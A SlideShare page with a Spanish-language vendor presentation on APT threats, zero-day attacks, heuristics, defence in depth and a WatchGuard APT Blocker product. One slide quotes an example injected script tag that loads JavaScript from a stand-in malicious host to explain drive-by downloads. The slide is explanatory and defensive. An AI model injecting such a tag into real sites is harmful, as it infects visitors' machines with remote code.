SlideShare una empresa de Scribd logo
1 de 45
La confianza es la mejor conexión
La confianza es la mejor conexión
La confianza es la mejor conexión
Conectividad:
Internet Empresarial.
Red Privada de Datos.
Enlaces de Alta Capacidad.
Fibra Oscura.
Soluciones Integradas:
Internet Seguro Administrado.
Internet con Video Vigilancia.
Video Conferencia por Internet
y más.
Seguridad Informática:
Antivirus.
Firewalls XTM.
WAF/IPS
Seguridad para E-mail, la Web
y prevención contra la fuga de
información.
Video IP:
Cámaras IP de Vigilancia.
Video Conferencia.
Redes LAN:
Redes de Cableado
Estructurado.
Redes Inalámbricas.
Fibra Óptica.
SwitchesCore y de Borde.
UPS.
Certificación de Redes.
Análisis de Desempeño.
Reparación y Reordenamiento
de Redes.
Correo Electrónico y
colaboración móvil:
E-mail, contactos, agenda, calendario
compartido y sincronización móvil.
Colaboración multiplataforma,
sincronización móvil inalámbrica,
robusta seguridad y archivado de
copia de seguridad automatizada.
Soluciones
IBW
La confianza es la mejor conexión
• Conceptos de Ataques
• Mercadeo de Amenazas
• Que es Apt
• Historia del Apt
• Ataques al SMB
• Estrategia de defensa en
Profundidad.
• APT Blocker
• Deteccion mediante análisis
de trafico.
TEMARIO
La confianza es la mejor conexión
AV-TEST Total Malware
4
La confianza es la mejor conexión
Que es una Vulnerabilidad y Exploit
Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar
algún método para explotarla.
Un exploit es aquel proceso o software que ataca una vulnerabilidad particular
de un sistema o aplicación.
La confianza es la mejor conexión
Que es Una BOTNET
La confianza es la mejor conexión
Ataque de Dia Cero
Ventana de Vulnerabilidad
La confianza es la mejor conexión
Que es Un Sand Box Y Un HoneyPot?
La confianza es la mejor conexión
HEURISTICA = PROTECCION DIA ZERO
Encontrar una solución
por prueba y error o por
reglas basadas en la
experiencia.
La confianza es la mejor conexión
HEURISTICA PASIVA
Su
Analiza programas tratando
de encontrar código anómalo
antes de pasarlo a correr en
el proceso central.
Busca patrones de
subrutinas,o llamadas de
programas que indiquen
comportamiento malicioso.
La confianza es la mejor conexión
HEURISTICA ACTIVA
Su
El motor ejecuta el código en un
ambiente Virtual
controlado”SandBox”.Analizando
los cambios en el entorno virtual.
La Heurística Activa puede
detectar código malicioso
encriptado, codificado
compresión y código
polimorfo
La confianza es la mejor conexión
METODO DE INFECCION DRIVE
BY DOWNLOAD
DBDB
Parte 1: Ataque automatizado SQL ,HTML InjectionParte 2: Drive-by Download
<iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe> OR IFRAME
La confianza es la mejor conexión
Mercado de Vulnerabilidades
IDEFENSE SECURITY
INTELLIGENCE SERVICES
La confianza es la mejor conexión
Valor de la Botnet en el mercado
lPrecio por maquina Zombie $.10 a $1 en el Rango de 10,000 PC
lPrecio Unitario por PC $100
lEl precio de credenciales y tarjetas de crédito se vende por aparte.
lRenta de una Botnet para DOS $200 /día . 10 K zombies.
lLA botnet Zeus a sido rentada por $500 /día 12k-
l
La confianza es la mejor conexión
Que son las APT
Advanced Persistant Threat
(APT) Malware de alta tecnología
diseñado para ser sigiloso y
mantener el control de un sistema
La confianza es la mejor conexión
Línea de tiempo de las Amenazas
GhostNet
Operation
Aurora
Stuxnet
RSA/Lockheed
Duqu
Flame
Gauss
NYTimes
Adobe
Target
Mar.
2009
Jan.
2010
Jun.
2010
Mar.
2011
Sep.2
011 May
2012
Dec.
2013
Jun.
2012
Jan.
2013
2009 2010 2011 2012 2013 2014
Oct.
2013
China-based
C&C
Spear Phishing
Political Targets
IE 0day
Comment Crew
(CN)
Stole Gmail and
Src
Four 0day
PLC Rootkit
Broke
Centrifuges
0day Flash Flaw
0dayTrojan
Stole SecureID
Info
0day Word flaw
Iran, Sudan,
Syrian
Cyber
Espionage
0day MS Cert
Flaw
Stole IP
Target Iranian
Oil
Targeted
Lebanon
USB LNK Flaw
APT Bank Trojan
152M records
0day
Coldfusion
Stolen source
China-based
Spear
phishing
0day
malware
40M CCNs
0day
malware
Partner
access
Nacion-Estado / Politica Criminales / Privadas
La confianza es la mejor conexión
CADENA COMPLETA DEL APT
La confianza es la mejor conexión
La confianza es la mejor conexión
Las Técnicas de APT ahora atacan el
SMB
Zeus copia los ataques Stuxnet 0 day
Criminales usan 0day malware (Cryptolocker)
Zeus usa Certificados Robados
Criminales spear phishing
Criminales con Ataques watering hole
Ahora, los criminals del malware
exploits las mismas tacticas
avanzadas que los que Ataque de
Estado. Cada organizacion esta en
riesgo de los APT!
La confianza es la mejor conexión
HERRAMIENTAS COMERCIALES
PARA HACKING Y PHISHING
La confianza es la mejor conexión
Software Evasión Dinámica
• Dynamic Evasion
• Checks for Environment
• Tool Kits Available for Download
Defeats sandbox and
virtual machines
Fireware 11.9
La confianza es la mejor conexión
PORQUE ATACAR LA SMB
GRAN EMPRESA $$$$
SMB $
La confianza es la mejor conexión
“ MENOS DEL 1% DE LOS EMPLEADOS MANTIENEN CONDUCTAS
MALICIOSAS O TRATAN DE ATACAR LA EMPRESA.PERO EL 100% DE LOS
EMPLEADOS PUEDEN SER COMPROMETIDOS SIN DARSE CUENTA
PARA ATACAR LA EMPRESA”
¨”El Hacker puede aprovechar cualquier info de las Redes Sociales”
La confianza es la mejor conexión
CARACTERISTICAS PRINCIPALES
DE UN APT
24
• Amenaza dedicada a blanco especifico
• Utiliza técnicas sofisticadas
• Comunicaciones Cifradas.
• Se puede transmitir USB
• Usa Puertos 80,443,53
• Ingeniería social
• Vulnerabilidades de día cero
• Certificados fraudulentos
• Mando y Control Centralizado
• Sin ser detectados durante períodos
prolongados
• Enmascaramiento exfiltración
La confianza es la mejor conexión
Fuentes Generadoras de APT
La confianza es la mejor conexión
Estrategia de defensa en Profundidad
Algunas alternativas incluyen la mitigacion
del riesgo basados en capas de seguridad
y control de Parches;
Las Apt y los Ataques de dia Cero pueden
Sobrepasar las capas.
Administraciòn de Parches
Control de vulnerabilidades Proactivo
Control de Aplicaciones Y
Proxys
Control Gris
Control Dispositivos
Y navegación
Control del flujo
AV/IPs
Control Conocido
Cifrado de media y Disco
Control de Datos
La confianza es la mejor conexión
Efectividad del AV e IPs?
Pros:
• Detiene “background noise” malware
• Puede detectar código reutilizado ( baja
probabilidad )
• Podria detener payloads despues de ser
descubiertos
Cons:
• No es una defense Proactiva ante las APT
• Evade la Euristica mediante encripció y
enmascaramiento de operaciones en
tiempo.
• La Heuristica Dinámica es de alto
desempeño y baja tasa de detecciòn.
Av/ips
Control the Known
La confianza es la mejor conexión
Efectividad Device Control Y Navegacion
(Control WEB y Reputación)
Device Control y
Navegacion
Control the Flow
Pros:
• Puede evitar que los dispositivos no autorizados o las
descargas inyectan malware.
• Puede parar determinados tipos de archivos se copien
en máquinas host
• Método preventivo.
Cons:
• Siempre hay un host que esta expuesto por excepción
de políticas Ataque lateral.
La confianza es la mejor conexión
Efectividad del cifrado?
Cifrado de Media y Disco Duro
Control the Data
Pros:
• Hace adquisición de datos lateral más difícil
• Una buena capa de protección de datos fuera de la
APT
Cons:
• Generalmente no protegerá los datos si el punto final
se ve comprometida a nivel de sistema
La confianza es la mejor conexión
Efectividad del Control de Aplicaciones y Proxys
Control de Aplicaciones y
Proxys DPI
Control the Grey
Pros:
• Extremadamente eficaz contra los ataques de día cero
• Detiene desconocidos , cargas útiles de malware
dirigidos
• Impacto bajo rendimiento en los puntos finales
Cons:
• A medida que la flexibilidad de las política se
incrementa deja de ser efectivo.
• No detiene inyecciones en memoria ( ataques que no
escapan a la memoria de servicio)
La confianza es la mejor conexión
Efectividad de Administración Parches
Administracion de Parches
Control the Vulnerability Landscape
Pros:
• Elimina la superficie atacable que los hackers pueden
dirigir
• Configuración central de cortafuegos de escritorio
nativas
• Mejora el rendimiento de punto final y la estabilidad
• Se puede activar la protección de la inyección de
memoria nativa
Cons:
• No detiene ataques de día Cero
La confianza es la mejor conexión
Curva de Ataques de Dia Cero
AV/IPS OS / ApplicationSandBox
Malware And
Virus Detection
La confianza es la mejor conexión
APT Blocker
Best of Breed Partner - Lastline
Fundada en 2011
Dir Redwood City, CA
8 años de investigación.
Fireware 11.9
• Emulador de codigo mediante sandbox
en la Nube.
• Emulacion de Sistema incluyendo
actividad de Hardware
• Detecta malware Dia 0
• Inspecciona Millones de codigo en un
instante
• Puede detector técnicas de Evasion
La confianza es la mejor conexión
Malware (R)evolution
Simple Threats
OpportunisticAttacks
APT
Solutions
Antivirus
Solutions
TargetedAttacks
Packing
Sophisticated Threats
Plain
Virus
Poly-
morphic
C&C
Fluxing
Persistent
Threats
Evasive
Threats
Fireware 11.9
La confianza es la mejor conexión
APT Blocker – Analisis de Malware en HD
Ejecución y emulación de código
Instrucciones de CPU Individuales
Memory accesses
System calls
Detección de Evasion
Provee granularidad y precisión que excede
A la competencia
Fireware 11.9
La confianza es la mejor conexión
Windows XP and Windows 7
• All Windows Executable Files
• MS Word
• Excel
• PowerPoint
• PDF
Android
• APK
APT Blocker
Fireware 11.9
La confianza es la mejor conexión
APTBlock
er
Cache
Local
“Cache”
Remoto
Carga
Archivo
APT Blocker Fireware 11.9
La confianza es la mejor conexión
WatchGuard Dimension Visibilidad
38
Advanced Malware in
Security Dashboard
Fireware 11.9
La confianza es la mejor conexión
Reports in WatchGuard Dimension
39
Fireware 11.9
La confianza es la mejor conexión
Visibility Explains Why This Is Malware
40
Drill down to find why the
activity is determined to
be malware
Fireware 11.9
La confianza es la mejor conexión
Security Dashboard
• Blocked Clients
• Blocked Destinations
• Blocked URL Categories
• Blocked Applications
• Blocked Protocols
• Blocked Intrusions
• Blocked Viruses
La confianza es la mejor conexión
Threat Map
La confianza es la mejor conexión
“Más del 95% de las vulnerabilidades de los firewall son
causadas por mala configuración de los mismos, no por
defectos de los equipos”
-Gartner, 2011
La confianza es la mejor conexión
RECOMENDACIONES DE SEGURIDAD
• Establecer Políticas de seguridad y control de acceso.
• Establecer sitios de contingencia y backups
• Establecer un plan de desastres y recuperación
• Actualizar firmas y parches
• No dejar abiertos servicios innecesarios
• Contar con tecnología apropiada
• Escaneo de Https
• Uso de diferentes capas de seguridad que cierren el vector de ataque.
• Estar actualizado sobre nuevas amenazas
• Educar a los usuarios en materia de seguridad
• Poseer un plan de seguridad
• No ver los sistemas de seguridad como cajas negras.
• Tener Herramientas de visibilidad y correlación de trafico en forma grafica.
La confianza es la mejor conexión
Gracias !!!

Más contenido relacionado

La actualidad más candente

Estrategias de Ciberseguridad para enfrentar Amenzas Emergentes
Estrategias de Ciberseguridad para enfrentar Amenzas EmergentesEstrategias de Ciberseguridad para enfrentar Amenzas Emergentes
Estrategias de Ciberseguridad para enfrentar Amenzas EmergentesSecpro - Security Professionals
 
Las redes y su seguridad
Las redes y su seguridadLas redes y su seguridad
Las redes y su seguridadDignaMariaBD
 
Tecnicas de Ataque a Infraestructura Critica Maritima V. publica
Tecnicas de Ataque a  Infraestructura Critica Maritima V. publicaTecnicas de Ataque a  Infraestructura Critica Maritima V. publica
Tecnicas de Ataque a Infraestructura Critica Maritima V. publicaSecpro - Security Professionals
 
Anatomia malware moderno angel serrano palo_altonetworks
Anatomia malware moderno angel serrano palo_altonetworksAnatomia malware moderno angel serrano palo_altonetworks
Anatomia malware moderno angel serrano palo_altonetworksNextel S.A.
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Ud seguridad en internet (1)
Ud   seguridad en internet (1)Ud   seguridad en internet (1)
Ud seguridad en internet (1)fetouch
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...
TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...
TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...Cristian Garcia G.
 
Sistemas de Control y contención de amenazas CISCO
Sistemas de Control y contención de amenazas CISCOSistemas de Control y contención de amenazas CISCO
Sistemas de Control y contención de amenazas CISCOgugarte
 
Seguridadinformaticaalexicorrea
SeguridadinformaticaalexicorreaSeguridadinformaticaalexicorrea
Seguridadinformaticaalexicorreaalexcore69
 
Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...
Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...
Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...Foro Global Crossing
 
Capacitacion apt blocker
Capacitacion apt blockerCapacitacion apt blocker
Capacitacion apt blockerJose Molina
 
[WEBINAR] Firewall de Nueva Generación.
[WEBINAR] Firewall de Nueva Generación.[WEBINAR] Firewall de Nueva Generación.
[WEBINAR] Firewall de Nueva Generación.Grupo Smartekh
 
3.1. Ataques conceptos técnicas
3.1. Ataques   conceptos técnicas3.1. Ataques   conceptos técnicas
3.1. Ataques conceptos técnicasDavid Narváez
 
Seguridad de redes (congreso)
Seguridad de redes (congreso)Seguridad de redes (congreso)
Seguridad de redes (congreso)Nbsecurity
 
Seguridad de Servidores Web
Seguridad de Servidores WebSeguridad de Servidores Web
Seguridad de Servidores WebSumdury
 
4.1 Protección y Seguridad
4.1 Protección y Seguridad4.1 Protección y Seguridad
4.1 Protección y SeguridadDavid Narváez
 

La actualidad más candente (17)

Estrategias de Ciberseguridad para enfrentar Amenzas Emergentes
Estrategias de Ciberseguridad para enfrentar Amenzas EmergentesEstrategias de Ciberseguridad para enfrentar Amenzas Emergentes
Estrategias de Ciberseguridad para enfrentar Amenzas Emergentes
 
Las redes y su seguridad
Las redes y su seguridadLas redes y su seguridad
Las redes y su seguridad
 
Tecnicas de Ataque a Infraestructura Critica Maritima V. publica
Tecnicas de Ataque a  Infraestructura Critica Maritima V. publicaTecnicas de Ataque a  Infraestructura Critica Maritima V. publica
Tecnicas de Ataque a Infraestructura Critica Maritima V. publica
 
Anatomia malware moderno angel serrano palo_altonetworks
Anatomia malware moderno angel serrano palo_altonetworksAnatomia malware moderno angel serrano palo_altonetworks
Anatomia malware moderno angel serrano palo_altonetworks
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Ud seguridad en internet (1)
Ud   seguridad en internet (1)Ud   seguridad en internet (1)
Ud seguridad en internet (1)
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...
TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...
TELECONFERENCIA : Solución Avanzada de EDR (End-Point Detection and Response)...
 
Sistemas de Control y contención de amenazas CISCO
Sistemas de Control y contención de amenazas CISCOSistemas de Control y contención de amenazas CISCO
Sistemas de Control y contención de amenazas CISCO
 
Seguridadinformaticaalexicorrea
SeguridadinformaticaalexicorreaSeguridadinformaticaalexicorrea
Seguridadinformaticaalexicorrea
 
Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...
Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...
Riesgos a los que se exponen las empresas y cómo evitar las consecuencias, po...
 
Capacitacion apt blocker
Capacitacion apt blockerCapacitacion apt blocker
Capacitacion apt blocker
 
[WEBINAR] Firewall de Nueva Generación.
[WEBINAR] Firewall de Nueva Generación.[WEBINAR] Firewall de Nueva Generación.
[WEBINAR] Firewall de Nueva Generación.
 
3.1. Ataques conceptos técnicas
3.1. Ataques   conceptos técnicas3.1. Ataques   conceptos técnicas
3.1. Ataques conceptos técnicas
 
Seguridad de redes (congreso)
Seguridad de redes (congreso)Seguridad de redes (congreso)
Seguridad de redes (congreso)
 
Seguridad de Servidores Web
Seguridad de Servidores WebSeguridad de Servidores Web
Seguridad de Servidores Web
 
4.1 Protección y Seguridad
4.1 Protección y Seguridad4.1 Protección y Seguridad
4.1 Protección y Seguridad
 

Similar a Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su empresa.

Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0
Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0
Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0Eduardo Brenes
 
Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...
Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...
Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...AEC Networks
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicioCamilo Fernandez
 
Capacitacion apt blocker
Capacitacion apt blockerCapacitacion apt blocker
Capacitacion apt blockerJose Molina
 
Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5Héctor López
 
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITYMemorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITYAranda Software
 
Cloud security adoption sophos
Cloud security adoption sophosCloud security adoption sophos
Cloud security adoption sophosCSA Argentina
 
VIRUS INFORMATICOS
VIRUS INFORMATICOSVIRUS INFORMATICOS
VIRUS INFORMATICOScotitta
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...Héctor López
 
Xelere - IBM Security QRadar
Xelere - IBM Security QRadarXelere - IBM Security QRadar
Xelere - IBM Security QRadarXelere Seguridad
 
Webinar Cloud: Servicios de Seguridad Gestionada
Webinar Cloud: Servicios de Seguridad GestionadaWebinar Cloud: Servicios de Seguridad Gestionada
Webinar Cloud: Servicios de Seguridad GestionadaArsys
 
Introduccion seguridad informatica - chakan
Introduccion seguridad informatica   - chakanIntroduccion seguridad informatica   - chakan
Introduccion seguridad informatica - chakanch4k4n
 
Casos reales de violaciones de seguridad
Casos reales de violaciones de seguridadCasos reales de violaciones de seguridad
Casos reales de violaciones de seguridadLuis Sánchez Ortega
 
Seguretat A Internet
Seguretat A InternetSeguretat A Internet
Seguretat A Internetnachete09
 

Similar a Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su empresa. (20)

Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0
Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0
Sonic wall net_sec_ sol_overview_2017_customer_short_v1.0
 
Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...
Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...
Zscaler - webcast de Gartner - Los peligros ocultos detrás de su motor de bús...
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
 
Capacitacion apt blocker
Capacitacion apt blockerCapacitacion apt blocker
Capacitacion apt blocker
 
Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5
 
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITYMemorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
Memorias webCast Prevención de Ataques de Dia-0 con Aranda 360 ENDPOINT SECURITY
 
Cloud security adoption sophos
Cloud security adoption sophosCloud security adoption sophos
Cloud security adoption sophos
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Ccnas v11 ch01_eb
Ccnas v11 ch01_ebCcnas v11 ch01_eb
Ccnas v11 ch01_eb
 
VIRUS INFORMATICOS
VIRUS INFORMATICOSVIRUS INFORMATICOS
VIRUS INFORMATICOS
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
 
Xelere - IBM Security QRadar
Xelere - IBM Security QRadarXelere - IBM Security QRadar
Xelere - IBM Security QRadar
 
Webinar Cloud: Servicios de Seguridad Gestionada
Webinar Cloud: Servicios de Seguridad GestionadaWebinar Cloud: Servicios de Seguridad Gestionada
Webinar Cloud: Servicios de Seguridad Gestionada
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Introduccion seguridad informatica - chakan
Introduccion seguridad informatica   - chakanIntroduccion seguridad informatica   - chakan
Introduccion seguridad informatica - chakan
 
Casos reales de violaciones de seguridad
Casos reales de violaciones de seguridadCasos reales de violaciones de seguridad
Casos reales de violaciones de seguridad
 
INFORMATICA
INFORMATICAINFORMATICA
INFORMATICA
 
Seguretat A Internet
Seguretat A InternetSeguretat A Internet
Seguretat A Internet
 

Último

institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenajuniorcuellargomez
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAdanielaerazok
 
Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenadanielaerazok
 
12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdf12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdfedwinmelgarschlink2
 
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfNUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfisrael garcia
 
COMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COM
COMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COMCOMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COM
COMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COMcespitiacardales
 
libro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdflibro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdfFAUSTODANILOCRUZCAST
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfOscarBlas6
 
Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webDecaunlz
 
Guia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdfGuia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdflauradbernals
 

Último (10)

institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalena
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
 
Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalena
 
12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdf12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdf
 
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfNUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
 
COMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COM
COMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COMCOMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COM
COMOGANARAMIGODPARACRISTOIGLESIAADVENTISTANECOCLI,COM
 
libro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdflibro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdf
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdf
 
Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la web
 
Guia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdfGuia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdf
 

Conozca y detecte los nuevos ataques cibernéticos apt a los que se expone su empresa.

  • 1. La confianza es la mejor conexión La confianza es la mejor conexión
  • 2. La confianza es la mejor conexión Conectividad: Internet Empresarial. Red Privada de Datos. Enlaces de Alta Capacidad. Fibra Oscura. Soluciones Integradas: Internet Seguro Administrado. Internet con Video Vigilancia. Video Conferencia por Internet y más. Seguridad Informática: Antivirus. Firewalls XTM. WAF/IPS Seguridad para E-mail, la Web y prevención contra la fuga de información. Video IP: Cámaras IP de Vigilancia. Video Conferencia. Redes LAN: Redes de Cableado Estructurado. Redes Inalámbricas. Fibra Óptica. SwitchesCore y de Borde. UPS. Certificación de Redes. Análisis de Desempeño. Reparación y Reordenamiento de Redes. Correo Electrónico y colaboración móvil: E-mail, contactos, agenda, calendario compartido y sincronización móvil. Colaboración multiplataforma, sincronización móvil inalámbrica, robusta seguridad y archivado de copia de seguridad automatizada. Soluciones IBW
  • 3. La confianza es la mejor conexión • Conceptos de Ataques • Mercadeo de Amenazas • Que es Apt • Historia del Apt • Ataques al SMB • Estrategia de defensa en Profundidad. • APT Blocker • Deteccion mediante análisis de trafico. TEMARIO
  • 4. La confianza es la mejor conexión AV-TEST Total Malware 4
  • 5. La confianza es la mejor conexión Que es una Vulnerabilidad y Exploit Es la debilidad o hueco en un sistema por el cual un atacante puede utilizar algún método para explotarla. Un exploit es aquel proceso o software que ataca una vulnerabilidad particular de un sistema o aplicación.
  • 6. La confianza es la mejor conexión Que es Una BOTNET
  • 7. La confianza es la mejor conexión Ataque de Dia Cero Ventana de Vulnerabilidad
  • 8. La confianza es la mejor conexión Que es Un Sand Box Y Un HoneyPot?
  • 9. La confianza es la mejor conexión HEURISTICA = PROTECCION DIA ZERO Encontrar una solución por prueba y error o por reglas basadas en la experiencia.
  • 10. La confianza es la mejor conexión HEURISTICA PASIVA Su Analiza programas tratando de encontrar código anómalo antes de pasarlo a correr en el proceso central. Busca patrones de subrutinas,o llamadas de programas que indiquen comportamiento malicioso.
  • 11. La confianza es la mejor conexión HEURISTICA ACTIVA Su El motor ejecuta el código en un ambiente Virtual controlado”SandBox”.Analizando los cambios en el entorno virtual. La Heurística Activa puede detectar código malicioso encriptado, codificado compresión y código polimorfo
  • 12. La confianza es la mejor conexión METODO DE INFECCION DRIVE BY DOWNLOAD DBDB Parte 1: Ataque automatizado SQL ,HTML InjectionParte 2: Drive-by Download <iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe> OR IFRAME
  • 13. La confianza es la mejor conexión Mercado de Vulnerabilidades IDEFENSE SECURITY INTELLIGENCE SERVICES
  • 14. La confianza es la mejor conexión Valor de la Botnet en el mercado lPrecio por maquina Zombie $.10 a $1 en el Rango de 10,000 PC lPrecio Unitario por PC $100 lEl precio de credenciales y tarjetas de crédito se vende por aparte. lRenta de una Botnet para DOS $200 /día . 10 K zombies. lLA botnet Zeus a sido rentada por $500 /día 12k- l
  • 15. La confianza es la mejor conexión Que son las APT Advanced Persistant Threat (APT) Malware de alta tecnología diseñado para ser sigiloso y mantener el control de un sistema
